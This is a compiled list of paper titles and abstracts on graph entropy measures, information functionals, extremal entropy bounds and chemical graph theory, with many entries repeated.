--- paper_title: A note on the information content of graphs paper_content: The role played by the group of a graph in determining sets of equivalent points is exposed and illustrated by a few simple examples. --- paper_title: A history of graph entropy measures paper_content: This survey seeks to describe methods for measuring the entropy of graphs and to demonstrate the wide applicability of entropy measures. Setting the scene with a review of classical measures for determining the structural information content of graphs, we discuss graph entropy measures which play an important role in a variety of problem areas, including biology, chemistry, and sociology. In addition, we examine relationships between selected entropy measures, illustrating differences quantitatively with concrete examples. --- paper_title: A Large Scale Analysis of Information-Theoretic Network Complexity Measures Using Chemical Structures paper_content: This paper aims to investigate information-theoretic network complexity measures which have already been intensely used in mathematical- and medicinal chemistry including drug design. Numerous such measures have been developed so far but many of them lack a meaningful interpretation, e.g., we want to examine which kind of structural information they detect. Therefore, our main contribution is to shed light on the relatedness between some selected information measures for graphs by performing a large scale analysis using chemical networks. Starting from several sets containing real and synthetic chemical structures represented by graphs, we study the relatedness between a classical (partition-based) complexity measure called the topological information content of a graph and some others inferred by a different paradigm leading to partition-independent measures. Moreover, we evaluate the uniqueness of network complexity measures numerically. Generally, a high uniqueness is an important and desirable property when designing novel topological descriptors having the potential to be applied to large chemical databases. --- paper_title: Asymptotic enumeration of spanning trees paper_content: We give new general formulas for the asymptotics of the number of spanning trees of a large graph. A special case answers a question of McKay (1983) for regular graphs. The general answer involves a quantity for infinite graphs that we call "tree entropy", which we show is a logarithm of a normalized determinant of the graph Laplacian for infinite graphs. Tree entropy is also expressed using random walks. We relate tree entropy to the metric entropy of the uniform spanning forest process on quasi-transitive amenable graphs, extending a result of Burton and Pemantle (1993). --- paper_title: Life, information theory, and topology paper_content: The information content of an organism determines to a large extent its ability to perform the basic vital functions: selection of food, breaking up of the food molecules into appropriate parts, selection of those parts, and their assimilation. The information content needed is very large and requires a sufficiently large complexity of the organism. The information content of an organism is largely determined by the information content of the constituent organic molecules. The information content of the latter is in its turn determined by the number of physically distinguishable atoms or radicals of which the molecule is composed. 
The different arrangements of atoms in a molecule are represented by the structural formula, which is basically a graph. It is shown that the topology of this graph also determines to a large extent the information content. Different points of a graph may be physically indistinguishable; in general, however, they are different in regard to their topological properties. A study of the relations between the topological properties of graphs and their information content is suggested, and several theorems are demonstrated. A relation between topology and living processes is thus found also on the molecular level. --- paper_title: Novel topological descriptors for analyzing biological networks paper_content: Background ::: Topological descriptors, other graph measures, and in a broader sense, graph-theoretical methods, have been proven as powerful tools to perform biological network analysis. However, the majority of the developed descriptors and graph-theoretical methods does not have the ability to take vertex- and edge-labels into account, e.g., atom- and bond-types when considering molecular graphs. Indeed, this feature is important to characterize biological networks more meaningfully instead of only considering pure topological information. --- paper_title: Inequalities for entropy-based measures of network information content paper_content: This paper presents a method for establishing relations between entropy-based measures applied to graphs. A special class of relations called implicit information inequalities or implicit entropy bounds is developed. A number of entropy-based measures of the structural information content of a graph have been developed over the past several decades, but little attention has been paid to relations among these measures. The research reported here aims to remedy this deficiency. --- paper_title: A history of graph entropy measures paper_content: This survey seeks to describe methods for measuring the entropy of graphs and to demonstrate the wide applicability of entropy measures. Setting the scene with a review of classical measures for determining the structural information content of graphs, we discuss graph entropy measures which play an important role in a variety of problem areas, including biology, chemistry, and sociology. In addition, we examine relationships between selected entropy measures, illustrating differences quantitatively with concrete examples. --- paper_title: Connections between Classical and Parametric Network Entropies paper_content: This paper explores relationships between classical and parametric measures of graph (or network) complexity. Classical measures are based on vertex decompositions induced by equivalence relations. Parametric measures, on the other hand, are constructed by using information functions to assign probabilities to the vertices. The inequalities established in this paper relating classical and parametric measures lay a foundation for systematic classification of entropy-based measures of graph complexity. --- paper_title: Connections between Classical and Parametric Network Entropies paper_content: This paper explores relationships between classical and parametric measures of graph (or network) complexity. Classical measures are based on vertex decompositions induced by equivalence relations. Parametric measures, on the other hand, are constructed by using information functions to assign probabilities to the vertices. 
The inequalities established in this paper relating classical and parametric measures lay a foundation for systematic classification of entropy-based measures of graph complexity. --- paper_title: Information processing in complex networks: Graph entropy and information functionals paper_content: This paper introduces a general framework for defining the entropy of a graph. Our definition is based on a local information graph and on information functionals derived from the topological structure of a given graph. More precisely, an information functional quantifies structural information of a graph based on a derived probability distribution. Such a probability distribution leads directly to an entropy of a graph. Then, the structural information content of a graph is interpreted and defined as the derived graph entropy. Another major contribution of this paper is the investigation of relationships between graph entropies. In addition to this, we provide numerical results demonstrating not only the feasibility of our method, which has polynomial time complexity, but also its usefulness with regard to practical applications aiming at an understanding of information processing in complex networks. --- paper_title: Life, information theory, and topology paper_content: The information content of an organism determines to a large extent its ability to perform the basic vital functions: selection of food, breaking up of the food molecules into appropriate parts, selection of those parts, and their assimilation. The information content needed is very large and requires a sufficiently large complexity of the organism. The information content of an organism is largely determined by the information content of the constituent organic molecules. The information content of the latter is in its turn determined by the number of physically distinguishable atoms or radicals of which the molecule is composed. The different arrangements of atoms in a molecule are represented by the structural formula, which is basically a graph. It is shown that the topology of this graph also determines to a large extent the information content. Different points of a graph may be physically indistinguishable; in general, however, they are different in regard to their topological properties. A study of the relations between the topological properties of graphs and their information content is suggested, and several theorems are demonstrated. A relation between topology and living processes is thus found also on the molecular level. --- paper_title: Information theoretic measures of UHG graphs with low computational complexity paper_content: We introduce a novel graph class we call universal hierarchical graphs (UHG), whose topology appears in numerous problems representing, e.g., temporal, spatial or general process structures of systems. For this graph class we show that we can naturally assign two probability distributions, for nodes and for edges, which lead us directly to the definition of the entropy and joint entropy and, hence, mutual information, establishing an information theory for this graph class. Furthermore, we provide some results on the conditions under which these constrained probability distributions maximize the corresponding entropy. Also, we demonstrate that these entropic measures can be computed efficiently, which is a prerequisite for every large-scale practical application, and show some numerical examples.
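The information-functional framework sketched in the abstracts above turns a graph into a probability distribution by normalizing a positive value f(v) assigned to each vertex, and then takes the Shannon entropy of that distribution. The snippet below is a minimal illustration of this construction (my own sketch, not code from the cited papers); the degree-power functional used here is one assumed, simple choice of f.

# Illustrative sketch (not from the cited papers): graph entropy from an
# information functional f, via p(v) = f(v) / sum over w of f(w)
# and H = -sum over v of p(v) * log2 p(v).
from math import log2

def functional_entropy(n, edges, f):
    values = [f(v, edges) for v in range(n)]
    total = sum(values)
    return -sum((x / total) * log2(x / total) for x in values if x > 0)

def degree_power(c):
    """f(v) = deg(v)**c, an assumed simple choice of information functional."""
    def f(v, edges):
        return sum(1 for e in edges if v in e) ** c
    return f

star = [(0, i) for i in range(1, 5)]             # K_{1,4}: skewed degree distribution
cycle = [(i, (i + 1) % 5) for i in range(5)]     # C_5: all degrees equal
print(functional_entropy(5, star, degree_power(1)))    # 2.0 bits, below log2(5)
print(functional_entropy(5, cycle, degree_power(1)))   # log2(5), about 2.32 bits

For this degree-based functional the uniform (regular) case attains the maximum value log2(n), which is the pattern behind the extremal results discussed in the degree-based entropy abstracts later in this reference list.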
--- paper_title: Information theoretic measures of UHG graphs with low computational complexity paper_content: We introduce a novel graph class we call universal hierarchical graphs (UHG) whose topology can be found numerously in problems representing, e.g., temporal, spacial or general process structures of systems. For this graph class we show, that we can naturally assign two probability distributions, for nodes and for edges, which lead us directly to the definition of the entropy and joint entropy and, hence, mutual information establishing an information theory for this graph class. Furthermore, we provide some results under which conditions these constraint probability distributions maximize the corresponding entropy. Also, we demonstrate that these entropic measures can be computed efficiently which is a prerequisite for every large scale practical application and show some numerical examples. --- paper_title: Mathematical concepts in organic chemistry paper_content: A Chemistry and Topology.- 1 Topological Aspects in Chemistry.- 1.1 Topology in Chemistry.- 1.2 Abstraction in Science and How Far One Can Go.- 2 Molecular Topology.- 2.1 What is Molecular Topology?.- 2.2 Geometry, Symmetry, Topology.- 2.3 Definition of Molecular Topology.- B Chemistry and Graph Theory.- 3 Chemical Graphs.- 4 Fundamentals of Graph Theory.- 4.1 The Definition of a Graph.- 4.1.1 Relations.- 4.1.2 The First Definition of a Graph.- 4.1.3 The Second Definition of a Graph.- 4.1.4 Vertices and Edges.- 4.1.5 Isomorphic Graphs and Graph Automorphisms.- 4.1.6 Special Graphs.- 4.2 Subgraphs.- 4.2.1 Sachs Graphs.- 4.2.2 Matchings.- 4.3 Graph Spectral Theory.- 4.3.1 The Adjacency Matrix.- 4.3.2 The Spectrum of a Graph.- 4.3.3 The Sachs Theorem.- 4.3.4 The ?-Polynomial.- 4.4 Graph Operations.- 5 Graph Theory and Molecular Orbitals.- 6 Special Molecular Graphs.- 6.1 Acyclic Molecules.- 6.1.1 Trees.- 6.1.2 The Path and the Star.- 6.1.3 The Characteristic Polynomial of Trees.- 6.1.4 Trees with Greatest Number of Matchings.- 6.1.5 The Spectrum of the Path.- 6.2 The Cycle.- 6.3 Alternant Molecules.- 6.3.1 Bipartite Graphs.- 6.3.2 The Pairing Theorem.- 6.3.3 Some Consequences of the Pairing Theorem.- 6.4 Benzenoid Molecules.- 6.4.1 Benzenoid Graphs.- 6.4.2 The Characteristic Polynomial of Benzenoid Graphs.- 6.5 Hydrocarbons and Molecules with Heteroatoms.- 6.5.1 On the Question of the Molecular Graph.- 6.5.2 The Characteristic Polynomial of Weighted Graphs.- 6.5.3 Some Regularities in the Electronic Structure of Heteroconjugated Molecules.- C Chemistry and Group Theory.- 7 Fundamentals of Group Theory.- 7.1 The Symmetry Group of an Equilateral Triangle.- 7.2 Order, Classes and Representations of a Group.- 7.3 Reducible and Irreducible Representations.- 7.4 Characters and Reduction of a Reducible Representation.- 7.5 Subgroups and Sidegroups - Products of Groups.- 7.6 Abelian Groups.- 7.7 Abstract Groups and Group Isomorphism.- 8 Symmetry Groups.- 8.1 Notation of Symmetry Elements and Representations.- 8.2 Some Symmetry Groups.- 8.2.1 Rotation Groups.- 8.2.2 Groups with More than One n-Fold Axis, n > 2.- 8.2.3 Groups of Collinear Molecules.- 8.3 Transformation Properties and Direct Products of Irreducible Representations.- 8.3.1 Transformation Properties.- 8.3.2 Rules Concerning the Direct Product of Irreducible Representations.- 8.4 Some Applications of Symmetry Groups.- 8.4.1 Electric Dipole Moment.- 8.4.2 Polarizability.- 8.4.3 Motions of Atomic Nuclei: Translations, Rotations and Vibrations.- 8.4.4 Transition 
Probabilities for the Absorption of Light.- 8.4.5 Transition Probabilities in Raman Spectra.- 8.4.6 Group Theory and Quantum Chemistry.- 8.4.7 Orbital and State Correlations.- 9 Automorphism Groups.- 9.1 Automorphism of a Graph.- 9.2 The Automorphism Group A(G1).- 9.3 Cycle Structure of Permutations.- 9.4 Isomorphism of Graphs and of Automorphism Groups 112..- 9.5 Notation of some Permutation Groups.- 9.6 Direct Product and Wreath Product.- 9.7 The Representation of Automorphism Groups as Group Products.- 10 Some Interrelations between Symmetry and Automorphism Groups.- 10.1 The Idea of Rigid Molecules.- 10.2 Local Symmetries.- 10.3 Non-Rigid Molecules.- 10.4 What Determines the Respective Orders of the Symmetry and the Automorphism Group of a Given Molecule?.- D Special Topics.- 11 Topological Indices.- 11.1 Indices Based on the Distance Matrix.- 11.1.1 The Wiener Number and Related Quantities.- 11.1.2 Applications of the Wiener Number.- 11.2 Hosoya's Topological Index.- 11.2.1 Definition and Chemical Applications of Hosoya's Index.- 11.2.2 Mathematical Properties of Hosoya's Index.- 11.2.3 Example: Hosoya's Index of the Path and the Cycle.- 11.2.4 Some Inequalities for Hosoya's Index.- 12 Thermodynamic Stability of Conjugated Molecules.- 12.1 Total ?-Electron Energy and Thermodynamic Stability of Conjugated Molecules.- 12.2 Total ?-Electron Energy and Molecular Topology.- 12.3 The Energy of a Graph.- 12.4 The Coulson Integral Formula.- 12.5 Some Further Applications of the Coulson Integral Formula.- 12.6 Bounds for Total ?-Electron Energy.- 12.7 More on the McClelland Formula.- 12.8 Conclusion: Factors Determining the Total ?-Electron Energy.- 12.9 Use of Total ?-Electron Energy in Chemistry.- 13 Topological Effect on Molecular Orbitals.- 13.1 Topologically Related Isomers.- 13.2 Interlacing Rule.- 13.3 PE Spectra of Topomers.- 13.4 TEMO and a-Electron Systems.- 13.5 TEMO and Symmetry.- Appendices.- Appendix 1 Matrices.- Appendix 2 Determinants.- Appendix 3 Eigenvalues and Eigenvectors.- Appendix 4 Polynomials.- Appendix 5 Characters of Irreducible Representations of Symmetry Groups.- Appendix 6 The Symbols Used.- Literature.- References. --- paper_title: Entropy Bounds for Hierarchical Molecular Networks paper_content: In this paper we derive entropy bounds for hierarchical networks. More precisely, starting from a recently introduced measure to determine the topological entropy of non-hierarchical networks, we provide bounds for estimating the entropy of hierarchical graphs. Apart from bounds to estimate the entropy of a single hierarchical graph, we see that the derived bounds can also be used for characterizing graph classes. Our contribution is an important extension to previous results about the entropy of non-hierarchical networks because for practical applications hierarchical networks are playing an important role in chemistry and biology. In addition to the derivation of the entropy bounds, we provide a numerical analysis for two special graph classes, rooted trees and generalized trees, and demonstrate hereby not only the computational feasibility of our method but also learn about its characteristics and interpretability with respect to data analysis. --- paper_title: Entropy Bounds for Hierarchical Molecular Networks paper_content: In this paper we derive entropy bounds for hierarchical networks. 
More precisely, starting from a recently introduced measure to determine the topological entropy of non-hierarchical networks, we provide bounds for estimating the entropy of hierarchical graphs. Apart from bounds to estimate the entropy of a single hierarchical graph, we see that the derived bounds can also be used for characterizing graph classes. Our contribution is an important extension to previous results about the entropy of non-hierarchical networks because for practical applications hierarchical networks are playing an important role in chemistry and biology. In addition to the derivation of the entropy bounds, we provide a numerical analysis for two special graph classes, rooted trees and generalized trees, and demonstrate hereby not only the computational feasibility of our method but also learn about its characteristics and interpretability with respect to data analysis. --- paper_title: Information theoretic measures of UHG graphs with low computational complexity paper_content: We introduce a novel graph class we call universal hierarchical graphs (UHG) whose topology can be found numerously in problems representing, e.g., temporal, spacial or general process structures of systems. For this graph class we show, that we can naturally assign two probability distributions, for nodes and for edges, which lead us directly to the definition of the entropy and joint entropy and, hence, mutual information establishing an information theory for this graph class. Furthermore, we provide some results under which conditions these constraint probability distributions maximize the corresponding entropy. Also, we demonstrate that these entropic measures can be computed efficiently which is a prerequisite for every large scale practical application and show some numerical examples. --- paper_title: Information processing in complex networks: Graph entropy and information functionals paper_content: This paper introduces a general framework for defining the entropy of a graph. Our definition is based on a local information graph and on information functionals derived from the topological structure of a given graph. More precisely, an information functional quantifies structural information of a graph based on a derived probability distribution. Such a probability distribution leads directly to an entropy of a graph. Then, the structural information content of a graph will be is interpreted and defined as the derived graph entropy. Another major contribution of this paper is the investigation of relationships between graph entropies. In addition to this, we provide numerical results demonstrating not only the feasibility of our method, which has polynomial time complexity, but also its usefulness with regard to practical applications aiming to an understanding of information processing in complex networks. --- paper_title: Recent Developments in Quantitative Graph Theory: Information Inequalities for Networks paper_content: In this article, we tackle a challenging problem in quantitative graph theory. We establish relations between graph entropy measures representing the structural information content of networks. In particular, we prove formal relations between quantitative network measures based on Shannon's entropy to study the relatedness of those measures. In order to establish such information inequalities for graphs, we focus on graph entropy measures based on information functionals. 
To prove such relations, we use known graph classes whose instances have been proven useful in various scientific areas. Our results extend the foregoing work on information inequalities for graphs. --- paper_title: Degree Powers in Graphs with Forbidden Subgraphs paper_content: Yuster and Caro initiated the study of the sum of powers of the degrees of graphs with forbidden subgraphs. We settle two of their conjectures. --- paper_title: Entropy bounds for dendrimers paper_content: Many graph invariants have been used for the construction of entropy-based measures to characterize the structure of complex networks. When considering Shannon entropy-based graph measures, there has been very little work to find their extremal values. A reason for this might be the fact that Shannon's entropy represents a multivariate function and all probability values are not equal to zero when considering graph entropies. Dehmer and Kraus proved some extremal results for graph entropies which are based on information functionals and expressed some conjectures, generated by numerical simulations, to find extremal values of graph entropies. Dehmer and Kraus discussed the extremal values of entropies for dendrimers. In this paper, we continue to study the extremal values of graph entropy for dendrimers, which have most interesting applications in molecular structure networks, and also in the pharmaceutical and biomedical area. Among all dendrimers with n vertices, we obtain the extremal values of graph entropy based on different well-known information functionals. Numerical experiments verify our results. --- paper_title: Chemical graph theory paper_content: The concept of Ulam sub-graphs is discussed and it is shown that such sub-graphs may be used without difficulty for establishing the characteristic polynomials of general (vertex- and edge-weighted) graphs. The use of Ulam sub-graphs in obtaining characteristic polynomials is compared with the construction of such polynomials via the Heilbronner formula, and it is found that the latter approach is simpler, when it is applicable. --- paper_title: Triangles in a complete chromatic graph paper_content: Suppose that in a complete graph on N points, each edge is given arbitrarily either the color red or the color blue, but the total number of blue edges is fixed at T. We find the minimum number of monochromatic triangles in the graph as a function of N and T. The maximum number of monochromatic triangles presents a more difficult problem. Here we propose a reasonable conjecture supported by examples. --- paper_title: On Sets of Acquaintances and Strangers at any Party paper_content: It is our purpose to prove a more general result when the number 6 is replaced by any positive integer N (see Theorem 1 below). It is convenient to transform the problem into an equivalent problem concerning points and lines. The N persons involved are replaced by points A_k, k = 1, ..., N, no three of which are collinear, and if two persons are acquainted a line is drawn joining the corresponding pair of points. If the two persons are strangers then no line is drawn. Thus each collection of N people gives rise to a corresponding configuration of N points and L lines where 0 ≤ L ≤ N(N-1)/2. If three people are mutually acquainted the corresponding figure is a triangle which we will call a full triangle. If three people are pairwise strangers the corresponding figure consists of three points with no lines joining any pair. We call such a figure an empty triangle.
Any set of three points not the vertices of a full triangle, nor an empty triangle, will be called a partial triangle. Notice that a given point may simultaneously be a vertex of several triangles from each category. With these definitions we have --- paper_title: Extremality of degree-based graph entropies paper_content: Abstract Many graph invariants have been used for the construction of entropy-based measures to characterize the structure of complex networks. Based on Shannon’s entropy, we study graph entropies which are based on vertex degrees by using so-called information functionals. When considering Shannon entropy-based graph measures, there has been very little work to find their extremal values. The main contribution of this paper is to prove some extremal values for the underlying graph entropy of certain families of graphs and to find the connection between the graph entropy and the sum of degree powers. Further, conjectures to determine extremal values of graph entropies are given. --- paper_title: A Note on Distance-based Graph Entropies paper_content: A variety of problems in, e.g., discrete mathematics, computer science, information theory, statistics, chemistry, biology, etc., deal with inferring and characterizing relational structures by using graph measures. In this sense, it has been proven that information-theoretic quantities representing graph entropies possess useful properties such as a meaningful structural interpretation and uniqueness. As classical work, many distance-based graph entropies, e.g., the ones due to Bonchev et al. and related quantities have been proposed and studied. Our contribution is to explore graph entropies that are based on a novel information functional, which is the number of vertices with distance \(k\) to a given vertex. In particular, we investigate some properties thereof leading to a better understanding of this new information-theoretic quantity. --- paper_title: Degree-based entropies of networks revisited paper_content: Studies on the information content of graphs and networks have been initiated in the late fifties based on the seminal work due to Shannon and Rashevsky. Various graph parameters have been used for the construction of entropy-based measures to characterize the structure of complex networks. Based on Shannon's entropy, in Cao et?al. (Extremality of degree-based graph entropies, Inform. Sci. 278 (2014) 22-33), we studied graph entropies which are based on vertex degrees by using so-called information functionals. As a matter of fact, there has been very little work to find their extremal values when considered Shannon entropy-based graph measures. We pursue with this line of research by proving further extremal properties of the degree-based graph entropies. --- paper_title: A Note on Distance-based Graph Entropies paper_content: A variety of problems in, e.g., discrete mathematics, computer science, information theory, statistics, chemistry, biology, etc., deal with inferring and characterizing relational structures by using graph measures. In this sense, it has been proven that information-theoretic quantities representing graph entropies possess useful properties such as a meaningful structural interpretation and uniqueness. As classical work, many distance-based graph entropies, e.g., the ones due to Bonchev et al. and related quantities have been proposed and studied. 
Our contribution is to explore graph entropies that are based on a novel information functional, which is the number of vertices with distance \(k\) to a given vertex. In particular, we investigate some properties thereof leading to a better understanding of this new information-theoretic quantity. --- paper_title: Entropy bounds for dendrimers paper_content: Abstract Many graph invariants have been used for the construction of entropy-based measures to characterize the structure of complex networks. When considering Shannon entropy-based graph measures, there has been very little work to find their extremal values. A reason for this might be the fact that Shannon’s entropy represents a multivariate function and all probability values are not equal to zero when considering graph entropies. Dehmer and Kraus proved some extremal results for graph entropies which are based on information functionals and express some conjectures generated by numerical simulations to find extremal values of graph entropies. Dehmer and Kraus discussed the extremal values of entropies for dendrimers. In this paper, we continue to study the extremal values of graph entropy for dendrimers, which has most interesting applications in molecular structure networks, and also in the pharmaceutical and biomedical area. Among all dendrimers with n vertices, we obtain the extremal values of graph entropy based on different well-known information functionals. Numerical experiments verifies our results. --- paper_title: INFORMATION-THEORETIC CONCEPTS FOR THE ANALYSIS OF COMPLEX NETWORKS paper_content: In this article, we present information-theoretic concepts for analyzing complex networks. We see that the application of information-theoretic concepts to networks leads to interesting tasks and gives a possibility for understanding information processing in networks. The main contribution of this article is a method for determining the structural information content of graphs that is based on a tree decomposition. It turns out that the computational complexity of the underlying algorithm is polynomial. Finally, we present some numerical results to study the influence of the used methods on the resulting information contents. --- paper_title: A Large Scale Analysis of Information-Theoretic Network Complexity Measures Using Chemical Structures paper_content: This paper aims to investigate information-theoretic network complexity measures which have already been intensely used in mathematical- and medicinal chemistry including drug design. Numerous such measures have been developed so far but many of them lack a meaningful interpretation, e.g., we want to examine which kind of structural information they detect. Therefore, our main contribution is to shed light on the relatedness between some selected information measures for graphs by performing a large scale analysis using chemical networks. Starting from several sets containing real and synthetic chemical structures represented by graphs, we study the relatedness between a classical (partition-based) complexity measure called the topological information content of a graph and some others inferred by a different paradigm leading to partition-independent measures. Moreover, we evaluate the uniqueness of network complexity measures numerically. Generally, a high uniqueness is an important and desirable property when designing novel topological descriptors having the potential to be applied to large chemical databases. 
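Several of the abstracts above build a graph entropy by turning an information functional f over the vertices into a probability distribution and applying Shannon's formula. The short Python sketch below illustrates that general recipe only; it is not the algorithm of any particular cited paper, and the example graph, the degree functional and the distance-k functional are chosen purely for illustration.

import math
from collections import deque

def entropy_from_functional(graph, f):
    # Shannon entropy of the distribution p(v) = f(v) / sum_u f(u).
    values = [f(v) for v in graph]
    total = sum(values)
    return -sum((x / total) * math.log2(x / total) for x in values if x > 0)

def vertices_at_distance(graph, v, k):
    # Information functional f_k(v): number of vertices at distance exactly k from v (BFS).
    dist = {v: 0}
    queue = deque([v])
    while queue:
        u = queue.popleft()
        for w in graph[u]:
            if w not in dist:
                dist[w] = dist[u] + 1
                queue.append(w)
    return sum(1 for d in dist.values() if d == k)

# Example: a path on five vertices, stored as an adjacency dictionary.
path5 = {0: {1}, 1: {0, 2}, 2: {1, 3}, 3: {2, 4}, 4: {3}}

print(entropy_from_functional(path5, lambda v: len(path5[v])))                      # degree-based entropy
print(entropy_from_functional(path5, lambda v: vertices_at_distance(path5, v, 2)))  # distance-2 functional

Both calls run in polynomial time, which is consistent with the computational-feasibility remarks made in several of the abstracts.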
--- paper_title: Life, information theory, and topology paper_content: The information content of an organism determines to a large extent its ability to perform the basic vital functions: selection of food, breaking up of the food molecules into appropriate parts, selection of those parts, and their assimilation. The information content needed is very large and requires a sufficiently large complexity of the organism. The information content of an organism is largely determined by the information content of the constituent organic molecules. The information content of the latter is in its turn determined by the number of physically distinguishable atoms or radicals of which the molecule is composed. The different arrangements of atoms in a molecule are represented by the structural formula, which is basically a graph. It is shown that the topology of this graph also determines to a large extent the information content. Different points of a graph may be physically indistinguishable; in general, however, they are different in regard to their topological properties. A study of the relations between the topological properties of graphs and their information content is suggested, and several theorems are demonstrated. A relation between topology and living processes is thus found also on the molecular level. --- paper_title: On Extremal Properties of Graph Entropies paper_content: We study extremal properties of graph entropies based on so-called information functionals. We obtain som ee xtre mality results for the resulting graph entropies which rely on the well-known Shannon entropy. Also by applying these results, we infer some entropy bounds for certain graph classes. Further, conjectures to determine extremal values (maximum and minimum values) of the graph entropies graphs based on numerical results are given. --- paper_title: INFORMATION-THEORETIC CONCEPTS FOR THE ANALYSIS OF COMPLEX NETWORKS paper_content: In this article, we present information-theoretic concepts for analyzing complex networks. We see that the application of information-theoretic concepts to networks leads to interesting tasks and gives a possibility for understanding information processing in networks. The main contribution of this article is a method for determining the structural information content of graphs that is based on a tree decomposition. It turns out that the computational complexity of the underlying algorithm is polynomial. Finally, we present some numerical results to study the influence of the used methods on the resulting information contents. --- paper_title: On Sphere-Regular Graphs and the Extremality of Information-Theoretic Network Measures paper_content: The entropy of a chemical graph can be interpreted as its structural information content. In this paper, we study extremality properties of graph entropies based on so-called information functionals. Based on dierent information functionals using metrical properties of graphs, we tackle the problem of determining classes of graphs which take maximal and minimal values. Also, we dene a novel class of graphs which maximizes the structural information content based on the functional using i-spheres. Under certain assumptions, this class fully determines the class of maximal graphs based on their structural information content. For minimal graphs and other functionals, an analytic approach to the question failed. Hence we performed simulations and provide several conjectures on classes of extremal graphs by using our numerical results. 
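The extremality discussions in the preceding abstracts all rest on the same elementary property of Shannon's entropy. Stated for an arbitrary information functional f on a graph G with n vertices (this is the standard bound, not a result specific to any single cited paper):

\[
I_f(G) = -\sum_{i=1}^{n} p_i \log_2 p_i, \qquad p_i = \frac{f(v_i)}{\sum_{j=1}^{n} f(v_j)},
\]
\[
0 \le I_f(G) \le \log_2 n .
\]

The upper bound is attained exactly when f assigns the same value to every vertex (for instance the degree functional on a regular graph, or a sphere-based functional on the sphere-regular graphs discussed above), and the lower bound when the functional concentrates all mass on a single vertex.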
--- paper_title: Novel inequalities for generalized graph entropies - Graph energies and topological indices paper_content: The entropy of a graph is an information-theoretic quantity for measuring the complexity of a graph. After Shannon introduced the entropy to information and communication, many generalizations of the entropy measure have been proposed, such as Renyi entropy and Daroczy entropy. In this article, we prove accurate connections (inequalities) between generalized graph entropies, graph energies, and topological indices. Additionally, we obtain some extremal properties of nine generalized graph entropies by employing graph energies and topological indices. --- paper_title: Connections between generalized graph entropies and graph energy paper_content: Dehmer and Mowshowitz introduced a class of generalized graph entropies using known information-theoretic measures. These measures rely on assigning a probability distribution to a graph. In this article, we prove some extremal properties of such generalized graph entropies by using the graph energy and the spectral moments. Moreover, we study the relationships between the generalized graph entropies and compute the values of the generalized graph entropies for special graph classes. © 2014 Wiley Periodicals, Inc. Complexity 21: 35-41, 2015 --- paper_title: Entropy bounds for dendrimers paper_content: Abstract Many graph invariants have been used for the construction of entropy-based measures to characterize the structure of complex networks. When considering Shannon entropy-based graph measures, there has been very little work to find their extremal values. A reason for this might be the fact that Shannon’s entropy represents a multivariate function and all probability values are not equal to zero when considering graph entropies. Dehmer and Kraus proved some extremal results for graph entropies which are based on information functionals and express some conjectures generated by numerical simulations to find extremal values of graph entropies. Dehmer and Kraus discussed the extremal values of entropies for dendrimers. In this paper, we continue to study the extremal values of graph entropy for dendrimers, which has most interesting applications in molecular structure networks, and also in the pharmaceutical and biomedical area. Among all dendrimers with n vertices, we obtain the extremal values of graph entropy based on different well-known information functionals. Numerical experiments verifies our results. --- paper_title: Complexity of networks I: The set-complexity of binary graphs paper_content: The balance between symmetry and randomness as a property of networks can be viewed as a kind of “complexity.” We use here our previously defined “set complexity” measure (Galas et al., IEEE Trans Inf Theory 2010, 56), which was used to approach the problem of defining biological information, in the mathematical analysis of networks. This information theoretic measure is used to explore the complexity of binary, undirected graphs. The complexities, Ψ, of some specific classes of graphs can be calculated in closed form. Some simple graphs have a complexity value of zero, but graphs with significant values of Ψ are rare. We find that the most complex of the simple graphs are the complete bipartite graphs (CBGs). In this simple case, the complexity, Ψ, is a strong function of the size of the two node sets in these graphs. We find the maximum Ψ binary graphs as well. These graphs are distinct from, but similar to CBGs. 
Finally, we explore directed and stochastic processes for growing graphs (hill-climbing and random duplication, respectively) and find that node duplication and partial node duplication conserve interesting graph properties. Partial duplication can grow extremely complex graphs, while full node duplication cannot do so. By examining the eigenvalue spectrum of the graph Laplacian we characterize the symmetry of the graphs and demonstrate that, in general, breaking specific symmetries of the binary graphs increases the set-based complexity, Ψ. The implications of these results for more complex, multiparameter graphs, and for physical and biological networks and the processes of network evolution are discussed. © 2011 Wiley Periodicals, Inc. Complexity, 17,51–64, 2011 © 2011 Wiley Periodicals, Inc. --- paper_title: Encoding structural information uniquely with polynomial-based descriptors by employing the Randić matrix paper_content: In this paper we define novel graph measures based on the zeros of the characteristic polynomial by using the Randic matrix. We compute the novel graph descriptors on exhaustively generated graphs and trees and demonstrate that the measures encode their structural information uniquely. These results are compared with the same graph measures but based on the eigenvalues of the classical characteristic polynomial of a graph. Finally we interpret our findings that are evidenced by numerical results. --- paper_title: Generalized graph entropies paper_content: This article deals with generalized entropies for graphs. These entropies result from applying information measures to a graph using various schemes for defining probability distributions over the elements (e.g., vertices) of the graph. We introduce a new class of generalized measures, develop their properties, compute the measures for selected graphs, and briefly discuss potential applications to classification and clustering problems. © 2011 Wiley Periodicals, Inc. Complexity, 17,45–50, 2011 © 2011 Wiley Periodicals, Inc. --- paper_title: On Graph Entropy Measures for Knowledge Discovery from Publication Network Data paper_content: Many research problems are extremely complex, making interdisciplinary knowledge a necessity; consequently cooperative work in mixed teams is a common and increasing research procedure. In this paper, we evaluated information-theoretic network measures on publication networks. For the experiments described in this paper we used the network of excellence from the RWTH Aachen University, described in [1]. Those measures can be understood as graph complexity measures, which evaluate the structural complexity based on the corresponding concept. We see that it is challenging to generalize such results towards different measures as every measure captures structural information differently and, hence, leads to a different entropy value. This calls for exploring the structural interpretation of a graph measure [2] which has been a challenging problem. --- paper_title: A history of graph entropy measures paper_content: This survey seeks to describe methods for measuring the entropy of graphs and to demonstrate the wide applicability of entropy measures. Setting the scene with a review of classical measures for determining the structural information content of graphs, we discuss graph entropy measures which play an important role in a variety of problem areas, including biology, chemistry, and sociology. 
